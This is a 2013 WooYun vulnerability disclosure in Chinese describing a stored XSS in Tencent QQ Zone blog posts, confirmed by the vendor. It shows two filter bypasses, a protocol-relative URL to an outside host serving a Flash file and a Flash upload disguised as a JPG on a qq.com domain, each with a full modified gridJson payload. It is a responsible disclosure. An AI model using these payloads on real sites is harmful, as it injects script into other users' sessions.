当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-021018

漏洞标题:QQ空间某功能缺陷导致日志存储型XSS - 11

相关厂商:腾讯

漏洞作者: gainover

提交时间:2013-03-31 15:10

修复时间:2013-05-15 15:10

公开时间:2013-05-15 15:10

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-03-31: 细节已通知厂商并且等待厂商处理中
2013-04-01: 厂商已经确认,细节仅向厂商公开
2013-04-11: 细节向核心白帽子及相关领域专家公开
2013-04-21: 细节向普通白帽子公开
2013-05-01: 细节向实习白帽子公开
2013-05-15: 细节向公众公开

简要描述:

时隔多天,今天空闲了点,就去看看腾讯对上一个报告修复的如何了。 结果,修是修了,不过之前出现的错误修复再一次出现了,并且我在系列9修复方案中所担心会出现的修复方式,也出现了。因此,问题依然存在。 前些天某同学在乌云上提交的某漏洞被腾讯认为“不构成危害”忽略了,这里变废为宝,拿绕过腾讯的过滤方式挺不错的~~

详细说明:

1. 可以看到腾讯按照修复意见,对load的URL采用了checkURL函数进行判断。

1.jpg


上面这种判断,显然是存在问题的。
2. 一方面,开发人员又采用了 / 开头的正则, 作为判断相对路径的依据,前面已经犯过的错误。
同系列9,采用 //xsst.sinaapp.com/Xss.swf 即可绕过。
发布日志时,修改字段gridJson如下:

{"g1":{"visible":1,"id":1,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"???С???????"},"g0":{"visible":1,"id":0,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"???????????"},"g8":{"visible":1,"id":8,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"????????2012??"},"g2":{"visible":1,"id":2,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"???????"},"g6":{"visible":1,"id":6,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"????????"},"templateName":"??????","g7":{"visible":1,"id":7,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"???????"},"g4":{"visible":1,"id":4,"content":{"mood":"","image":"","date":"2013-03-26&1","text":""},"type":0,"title":"???? 2013-3-26"},"g3":{"visible":1,"id":3,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"????????"},"version":"1.2","g5":{"visible":1,"id":5,"content":{"mood":"","image":"//xsst.sinaapp.com/Xss.swf","date":"","text":""},"type":2,"title":"??????????"},"tempId":47,"bgItem":{"bgId":"87","bgURL":"/qzone/newblog/v5/flashassets/bg87.swf?bgver=1.0&max_age=31104000","gridcolor":"0xFF3300","alpha":1,"align":"right","wordcolor":"0xCC0000"}}


3. 另一方面,系列9的修复方案中,我已经说到了,最好不要使用 *.qq.com/... 的方式来判断外部资源URL。
结果这里就是采用的这种方式来判断的,因而我这里给出个简单的绕过方法。
前些天腾讯忽略了一个文件上传的漏洞,我们拿来用一用。

0.jpg


可以看到我们成功上传了一个FLASH文件,后缀采用JPG,腾讯这里没有对内容进行判断,仅仅是后缀。

2.jpg


将image的URL指定为新上传的地址。 http://data1.class.qq.com/funshow/2013-03-31/s_13647082964440.jpg#.swf
发布日志时,修改字段gridJson如下:

{"g1":{"visible":1,"id":1,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"???С???????"},"g0":{"visible":1,"id":0,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"???????????"},"g8":{"visible":1,"id":8,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"????????2012??"},"g2":{"visible":1,"id":2,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"???????"},"g6":{"visible":1,"id":6,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"????????"},"templateName":"??????","g7":{"visible":1,"id":7,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"???????"},"g4":{"visible":1,"id":4,"content":{"mood":"","image":"","date":"2013-03-26&1","text":""},"type":0,"title":"???? 2013-3-26"},"g3":{"visible":1,"id":3,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"????????"},"version":"1.2","g5":{"visible":1,"id":5,"content":{"mood":"","image":"http://data1.class.qq.com/funshow/2013-03-31/s_13647082964440.jpg#.swf","date":"","text":""},"type":2,"title":"??????????"},"tempId":47,"bgItem":{"bgId":"87","bgURL":"/qzone/newblog/v5/flashassets/bg87.swf?bgver=1.0&max_age=31104000","gridcolor":"0xFF3300","alpha":1,"align":"right","wordcolor":"0xCC0000"}}


可以看到打开日志时,成功加载我们上传的文件,并执行XSS。

3.jpg

漏洞证明:

见详细说明

修复方案:

见系列9

版权声明:转载请注明来源 gainover@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-04-01 09:56

厂商回复:

感谢,已在处理中。

最新状态:

暂无